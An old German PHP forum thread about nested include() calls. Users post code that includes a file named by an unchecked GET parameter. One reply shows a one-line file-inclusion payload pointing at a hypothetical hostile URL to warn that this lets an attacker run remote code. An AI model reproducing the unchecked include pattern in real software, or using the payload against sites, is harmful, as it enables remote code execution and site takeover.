php-resource



Zurück   PHP-Scripte PHP-Tutorials PHP-Jobs und vieles mehr > Entwicklung > PHP Developer Forum
 

Login

 
eingeloggt bleiben
star Jetzt registrieren   star Passwort vergessen
 

 

 


PHP Developer Forum Hier habt ihr die Möglichkeit, eure Skriptprobleme mit anderen Anwendern zu diskutieren. Seid so fair und beantwortet auch Fragen von anderen Anwendern. Dieses Forum ist sowohl für ANFÄNGER als auch für PHP-Profis! Fragen zu Laravel, YII oder anderen PHP-Frameworks.

Antwort
 
LinkBack Themen-Optionen Bewertung: Bewertung: 2 Stimmen, 5,00 durchschnittlich.
  #1 (permalink)  
Alt 15-04-2005, 20:51
MasterOfPuppets
 Newbie
Links : Onlinestatus : MasterOfPuppets ist offline
Registriert seit: Apr 2005
Beiträge: 20
MasterOfPuppets ist zur Zeit noch ein unbeschriebenes Blatt
Question [PHP5] Include im Include

Hi there,
Ich hab ein Problemchen mit einem Include in einem Include. Ich hab ein Switch-Script (nenn ich jetzt ma so, ihr versteht was ich mein wenn ihr euch den Code anguckt) geschrieben und die mit diesem Script eingebundene Datei soll selber noch eine HTML-Seite einfügen macht es aber nicht. Ich hab keine Ahnung warum das nicht funktioniert. Ach ja komich ist auch das keine Fehlermeldung kommt.

Das "Switch-Script":
PHP-Code:
<?php

if(isset($_GET['open'])) {
  
$to_open$_GET['open'];
  if(
file_exists("$to_open.php")) {
    include(
"$to_open.php");
  }
  else {
    echo(
'<b>Die Datei ');
    echo(
$to_open);
    echo(
'.php kann leider nicht gefunden werden...</b>');
  }
}
else {
  include(
'home.php');
}

?>
und home.php...

PHP-Code:
<?php
include(login.htm);
?>
Sonst enthalten die Dateien nur noch HTML und CSS

Ich hoffe ihr wisst Rat und bedank mich schon mal...

Geändert von MasterOfPuppets (15-04-2005 um 20:54 Uhr)
Mit Zitat antworten
  #2 (permalink)  
Alt 15-04-2005, 21:01
penizillin
 PHP Guru
Links : Onlinestatus : penizillin ist offline
Registriert seit: Feb 2004
Beiträge: 10.166
penizillin ist zur Zeit noch ein unbeschriebenes Blatt
Standard

PHP-Code:
include 'datei.html'
Mit Zitat antworten
  #3 (permalink)  
Alt 16-04-2005, 04:19
Benutzerbild von onemorenerd onemorenerd
  Moderator
Links : Onlinestatus : onemorenerd ist offline
Registriert seit: Mar 2005
Ort: Berlin
Beiträge: 9.471
onemorenerd wird schon bald berühmt werdenonemorenerd wird schon bald berühmt werden
Standard Re: [PHP5] Include im Include

ebenso
PHP-Code:
echo 'Auch Klammern haben mal Urlaub.'
Mit Zitat antworten
  #4 (permalink)  
Alt 16-04-2005, 11:12
MasterOfPuppets
 Newbie
Links : Onlinestatus : MasterOfPuppets ist offline
Registriert seit: Apr 2005
Beiträge: 20
MasterOfPuppets ist zur Zeit noch ein unbeschriebenes Blatt
Standard

Hm naja das funktioniert ebenfalls nicht. Das ist recht eigenartig. Kann es sein das dies an irgendeiner Serverkonfiguration liegen kann. Mir ist jetzt auch aufgefallen, das ich auch Scripte ersellen muss die dann nicht wie in diesen Fall HTML-Dateien einfügen sondern PHP-Dateien, ist da allgemein irgendwas zu beachten irgendwas anders oder so... ???
Mit Zitat antworten
  #5 (permalink)  
Alt 16-04-2005, 12:33
penizillin
 PHP Guru
Links : Onlinestatus : penizillin ist offline
Registriert seit: Feb 2004
Beiträge: 10.166
penizillin ist zur Zeit noch ein unbeschriebenes Blatt
Standard

E_ALL?
Mit Zitat antworten
  #6 (permalink)  
Alt 16-04-2005, 12:36
pekka
 PHP Master
Links : Onlinestatus : pekka ist offline
Registriert seit: Jun 2001
Ort: Köln
Beiträge: 6.608
pekka befindet sich auf einem aufstrebenden Ast
Standard

Include ('login.htm')?
Mit Zitat antworten
  #7 (permalink)  
Alt 16-04-2005, 13:56
MasterOfPuppets
 Newbie
Links : Onlinestatus : MasterOfPuppets ist offline
Registriert seit: Apr 2005
Beiträge: 20
MasterOfPuppets ist zur Zeit noch ein unbeschriebenes Blatt
Standard

Sorry, die HTML Datei wird doch angezeigt.
@penizillin äh das mit E_ALL äh nun ja was bedeutet das komm da nich ganz mit
Mit Zitat antworten
  #8 (permalink)  
Alt 16-04-2005, 14:10
Shurakai
 Master
Links : Onlinestatus : Shurakai ist offline
Registriert seit: May 2004
Ort: Bergisch Gladbach
Beiträge: 3.084
Shurakai ist zur Zeit noch ein unbeschriebenes Blatt
Standard

Zitat:
Original geschrieben von MasterOfPuppets
Sorry, die HTML Datei wird doch angezeigt.
@penizillin äh das mit E_ALL äh nun ja was bedeutet das komm da nich ganz mit
Du sollst error_reporting(E_ALL); in deinen Code schreiben, dann wird dir wirklich jeder kleinste Fehler angezeigt...
Mit Zitat antworten
  #9 (permalink)  
Alt 02-05-2005, 16:07
trinity2253
 Newbie
Links : Onlinestatus : trinity2253 ist offline
Registriert seit: Apr 2005
Beiträge: 31
trinity2253 ist zur Zeit noch ein unbeschriebenes Blatt
Standard

Ich glaub, ich weiß was er meint.

Er hat eine Standard Datei, sagen wir mal namens index.php eines Member-Bereichs. In diese will er z.B ein Upload.php als Startseite integrieren. Klappt ja auch mit dem Script. Dann per Link will er z.B seine Terminaktualisierung laden. Klappt so weit auch ja. Das Problem ist jetzt wahrscheinlich, daß diese Terminaktualiserung aus mehreren PHP-Site besteht. Und da ist wahrscheinlich das Problem. Mit den unteren Links der Terminaktualisierung kommt er wieder zurück auf die Startseite, weil hier quasi das Startseiten-Script durchlaufen wird.


Index.php

###### Startseite festgelegt ######

<?php
if(!isset($_GET['page'])) {
$page = 'upload.php';
} else {
$page = $_GET['page'];
}

include ($page);
?>

###### Die Links ######

--> <a href"index.php=?upload.php">
--> <a href"index.php=?termine.php">

###### Terminaktualisierung ######

--> <?PHP
if($action) {
if($action=="add") { include("add.php"); }
if($action=="del") { include("del.php"); }
if($action=="edit") { include("edit.php");}
}
else {
?>
<a href="admin/index.php?action=add">Termin hinzufügen</a>
<a href="admin/member.php?action=del">Termin löschen</a>
<a href="admin/member.php?action=edit">Termin editieren</a>
<?
}
?>

Tja, bin mal gespannt, ob er es so meint. Hatte auch mal das Problem und hab´s ehrlich gesagt auch nicht in den Griff bekommen.

Gruß
trinity2253


P.S. Entschuldige.... Kann im Eifer des Gefechts vorkommen... Natürlich ist es vorhanden....

Geändert von trinity2253 (02-05-2005 um 17:37 Uhr)
Mit Zitat antworten
  #10 (permalink)  
Alt 02-05-2005, 16:12
pekka
 PHP Master
Links : Onlinestatus : pekka ist offline
Registriert seit: Jun 2001
Ort: Köln
Beiträge: 6.608
pekka befindet sich auf einem aufstrebenden Ast
Standard

Da fehlt ein Anführungszeichen.
Mit Zitat antworten
  #11 (permalink)  
Alt 02-05-2005, 16:13
Shurakai
 Master
Links : Onlinestatus : Shurakai ist offline
Registriert seit: May 2004
Ort: Bergisch Gladbach
Beiträge: 3.084
Shurakai ist zur Zeit noch ein unbeschriebenes Blatt
Standard

Dann mache ich ein ?page=http://www.boeseseite.de/boesepage.php?bla= , schreibe in diese datei bösartigen php-code rein und übernehme deine space...
Mit Zitat antworten
  #12 (permalink)  
Alt 02-05-2005, 17:41
trinity2253
 Newbie
Links : Onlinestatus : trinity2253 ist offline
Registriert seit: Apr 2005
Beiträge: 31
trinity2253 ist zur Zeit noch ein unbeschriebenes Blatt
Standard

Tolle Antworten....
Es geht doch nur um das Prinzip, ODER???
Wie man seine Links mit Hilfe von md5 verschlüsseln kann, steht jawohl auf einem anderen Blatt Papier. Und das kann jeder nachlesen und halten wie er will.

Gruß
trinity2253
Mit Zitat antworten
  #13 (permalink)  
Alt 02-05-2005, 18:04
penizillin
 PHP Guru
Links : Onlinestatus : penizillin ist offline
Registriert seit: Feb 2004
Beiträge: 10.166
penizillin ist zur Zeit noch ein unbeschriebenes Blatt
Standard

links?
mit md5??
verschlüsseln???
Mit Zitat antworten
  #14 (permalink)  
Alt 02-05-2005, 18:14
trinity2253
 Newbie
Links : Onlinestatus : trinity2253 ist offline
Registriert seit: Apr 2005
Beiträge: 31
trinity2253 ist zur Zeit noch ein unbeschriebenes Blatt
Standard

Entschuldige, falsch ausgedrückt...


http://de2.php.net/manual/de/function.md5-file.php


Gruß
trinity2253
Mit Zitat antworten
  #15 (permalink)  
Alt 02-05-2005, 18:31
penizillin
 PHP Guru
Links : Onlinestatus : penizillin ist offline
Registriert seit: Feb 2004
Beiträge: 10.166
penizillin ist zur Zeit noch ein unbeschriebenes Blatt
Standard

weiß ehrlichgesagt immer noch nicht, was du meinst.
Mit Zitat antworten
Antwort

Lesezeichen


Aktive Benutzer in diesem Thema: 1 (Registrierte Benutzer: 0, Gäste: 1)
 

Themen-Optionen
Thema bewerten
Thema bewerten:

Forumregeln
Es ist Ihnen nicht erlaubt, neue Themen zu verfassen.
Es ist Ihnen nicht erlaubt, auf Beiträge zu antworten.
Es ist Ihnen nicht erlaubt, Anhänge hochzuladen.
Es ist Ihnen nicht erlaubt, Ihre Beiträge zu bearbeiten.

BB-Code ist an.
Smileys sind an.
[IMG] Code ist an.
HTML-Code ist aus.
Trackbacks are an
Pingbacks are an
Refbacks are an


PHP News

Die RIGID-FLEX-Technologie
Die RIGID-FLEX-TechnologieDie sogenannte "Flexible Elektronik" , oftmals auch als "Flexible Schaltungen" bezeichnet, ist eine zeitgemäße Technologie zum Montieren von elektronischen Schaltungen.

06.12.2018 | Berni

ebiz-trader 7.5.0 mit PHP7 Unterstützung veröffentlicht
ebiz-trader 7.5.0 mit PHP7 Unterstützung veröffentlichtDie bekannte Marktplatzsoftware ebiz-trader ist in der Version 7.5.0 veröffentlicht worden.

28.05.2018 | Berni


 

Aktuelle PHP Scripte

Newsmanager

Der Newsmanager ist ein Newssystem und Newsletter in einem. Mit WYSIWYG Editor und E-Mail import aus einer bestehenden MySql Datenbank sowie dynamische Kategorien / Themen Filter.

11.09.2019 Stephan_1972 | Kategorie: PHP/ News
Modelmanager

Der Modelmanager ist ein Webtool für Fotografen, kann als komplette Homepage oder als Webtool installiert werden.

11.09.2019 Stephan_1972 | Kategorie: PHP/ Webservice
ContentLion - Open Source CMS ansehen ContentLion - Open Source CMS

ContentLion ist ein in PHP geschriebenes CMS, bei dem man Seiten, Einstellungen usw. in Ordnern lagern kann

22.08.2019 stevieswebsite2 | Kategorie: PHP/ CMS
 Alle PHP Scripte anzeigen

Alle Zeitangaben in WEZ +2. Es ist jetzt 12:18 Uhr.